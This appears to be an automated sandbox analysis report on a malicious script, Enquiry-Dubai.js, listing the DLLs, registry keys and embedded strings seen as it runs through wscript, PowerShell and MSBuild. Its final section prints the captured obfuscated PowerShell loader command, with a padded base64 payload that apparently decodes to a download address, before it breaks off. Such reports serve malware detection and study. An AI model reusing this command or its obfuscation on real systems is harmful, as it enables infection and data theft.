                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vaultcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                        Source: Enquiry-Dubai.jsStatic file information: File size 1362606 > 1048576
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheaderdnlib.dotnet.mdrawmodulerowdnlib.dotnetimdtokenprovidermddnlib.pervadnlib.dotnet.writermodulewriteroptionsbase source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `2dnlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.
                        Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet.writermethodbodywriterbasednlib.dotnetgenericvardnlib.dotnetimemberrefparentdnlib.dotnetiownermodulednlib.dotnetpropertysigbioscharacteristicsmicrosoft.win32.taskscheduleritriggerdelaydnlib.dotnet.mdrawfieldmarshalrow source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinst
                        Source: Binary string: microsoft.win32.taskscheduleritaskhandlerdnlib.dotnet.writermethodbodydnlib.dotnet.resourcesresourcereaderexceptiondnlib.dotnet.writeritokencreatordnlib.peiimageoptionalheaderdnlib.peimagedatadirectorymicrosoft.win32.taskschedulertaskinstancespolicydnlib.dotnet.mdmdheaderruntimeversiondnlib.dotnet.emitlocallistdnlib.dotnet.emitexceptionhandlerdnlib.dotnet.writercor20headeroptionsdnlib.w32resourceswin32resourcespednlib.dotnet.mdrawdeclsecurityrowmicrosoft.win32.taskschedulericalendartriggermicrosoft.win32.taskschedulertaskeventargsdnlib.dotnet.writerimetadatalistenerdnlib.dotnetimportresolverdnlib.dotnetloggereventdnlib.dotnet.pdbpdbscopednlib.peimageoptionalheader32dnlib.dotnet.mdimetadatadnlib.dotnet.writerimodulewriterlistenerdnlib.dotnet.emitoperandtypednlib.dotnet.writermetadataeventeventfilterdnlib.dotnet.writermetadatadnlib.dotnetpublickeytokendnlib.dotnet.pdbisymbolwriter2dnlib.dotnetassemblydefuserdnlib.dotnetdeclsecurityusermicrosoft.win32.taskschedulerresourcereferencevaluednlib.dotnetassemblynameinfodnlib.dotnetmanifestresourceuserdnlib.dotnetaccesscheckermicrosoft.win32.taskschedulertasksetsecurityoptionsdnlib.dotnet.resourcesresourcewriterdnlib.dotnetmodulekinddnlib.peirvafileoffsetconverterdnlib.dotnetpropertydefusermicrosoft.win32.taskschedulertimetriggerdnlib.dotnetassemblyrefusermicrosoft.win32.taskschedulerwildcarddnlib.dotnetmethodspecmicrosoft.win32.taskschedulertaskeventlogmicrosoft.win32.taskschedulertasksessionstatechangetypednlib.dotnetmethodequalitycomparerdnlib.dotnetcustommarshaltypednlib.dotnetpropertydefmicrosoft.win32.taskscheduleridletriggerdnlib.dotnet.pdbpdbwriterdnlib.dotnettypedefuserdnlib.dotnet.emitstackbehaviourdnlib.dotnet.resourcesbuiltinresourcedatadnlib.dotnettypespecuserdnlib.dotnetfixedsysstringmarshaltypemicrosoft.win32.taskschedulertaskactiontypemicrosoft.win32.taskschedulerrepetitionpattern source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: microsoft.win32.taskschedulertasklogontypednlib.dotnet.pdb.dsssymbolreadercreator source: powershell.exe, 00000007.00000002.1465010749.00007FFC3C984000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000007.00000002.1429331571.000001AE1101E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1458640279.000001AE7CE80000.00000004.08000000.00040000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell%22");IHost.CreateObject("WScript.Shell");IHost.Name();IWshShell3._00000000();ITextStream.WriteLine(" exit:401922 o:Windows%20Script%20Host f:CreateObject r:");IWshShell3._00000000();ITextStream.WriteLine(" entry:403390 o: f:Run a0:%22powershell%20-NoProfile%20-Command%20%22%22%24Codigo%20%3D%20'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQs");IWshShell3.Run("powershell -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slans", "0", "false")
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command ""$Codigo = 'JslanshacksBtslanshacksG8slanshacksdslanshacksBvslanshacksHIslanshacksYgBpslanshacksGsslanshacksZQBkslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCcslanshacksIwB4slanshacksCMslanshacksLgslanshackszslanshacksDIslanshacksMgslanshacksvslanshacksHYslanshacksZQBkslanshacksC4slanshacksMgByslanshacksC4slanshacksMgslanshacks5slanshacksGQslanshacksMwslanshacks5slanshacksDMslanshacksZQBjslanshacksGYslanshacksMslanshacksslanshacksyslanshacksDUslanshacksOslanshacksslanshacks2slanshacksGQslanshacksYQBislanshacksGYslanshacksMslanshacksslanshacks0slanshacksGYslanshacksMslanshacksBlslanshacksGEslanshacksMslanshacksBkslanshacksDslanshacksslanshacksYgBmslanshacksDcslanshacksZgslanshacks2slanshacksC0slanshacksYgB1slanshacksHslanshacksslanshacksLwslanshacksvslanshacksDoslanshackscwBwslanshacksCMslanshacksIwBoslanshacksCcslanshacksOwslanshackskslanshacksHMslanshacksaslanshacksBhslanshacksG0slanshacksYQB0slanshacksGUslanshacksdQByslanshacksGkslanshackscwBtslanshacksCslanshacksslanshacksPQslanshacksgslanshacksCQslanshacksbQBvslanshacksHQslanshacksbwByslanshac